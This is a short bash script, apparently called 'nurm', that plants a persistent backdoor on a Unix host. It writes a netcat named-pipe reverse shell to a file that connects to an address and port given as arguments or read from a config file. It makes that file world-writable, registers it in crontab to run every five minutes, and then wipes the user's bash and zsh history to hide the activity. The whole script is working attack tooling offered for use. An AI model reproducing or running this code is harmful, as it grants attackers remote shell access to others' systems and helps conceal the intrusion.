#!/bin/bash
. nurm.conf
while getopts ":a:p:f:" opt; do
        case ${opt} in
                a )
			address=$OPTARG
                        ;;
                p )
			port=$OPTARG
			;;
                f )
		        filepath=$OPTARG
                        ;;
                \? )
                        echo "Invalid Usage!"
                        echo "Usage: ./nurm [-a <address>] [-p <port>] [-f <full-path-file>]"
                        ;;
                : )
                        echo "Usage: ./nurm [-a <address>] [-p <port>] [-f <full-path-file>]"
                        ;;
        esac
done

function inject() {
	if ! [ -z ${filepath} ]; then
        	echo "mkfifo /tmp/puesrrz; nc $address $port 0</tmp/puesrrz | /bin/sh >/tmp/puesrrz 2>&1; rm /tmp/puesrrz" > $filepath 2>/dev/null
        	chmod 777 $filepath 2>/dev/null
        	(crontab -l 2>/dev/null; echo "*/5 * * * * $filepath ") 2>/dev/null | crontab - 
		if ! [ -z ${dport} ]; then
		       	increment
	       	fi
		echo "Operation completed."
	fi
}

function increment() {
	sed '4d' nurm.conf > tmp
	tport=$(($dport+$incval))
	echo "dport=$tport" >> tmp
	cat tmp > nurm.conf
	rm tmp
}

function clearhistory() {
	echo " " > ~/.bash_history
	echo " " > ~/.zsh_history
}

function checkval() {
	if [ -z ${filepath} ]; then
		if ! [ -z ${dfile} ];then
			filepath=$dfile
		fi
	fi
	if [ -z ${port} ]; then
		if ! [ -z ${dport} ];then
			port=$dport
		fi
	fi
	if [ -z ${address} ]; then
		if ! [ -z ${daddr} ];then
			address=$daddr
		fi
	fi
}

checkval
inject
clearhistory
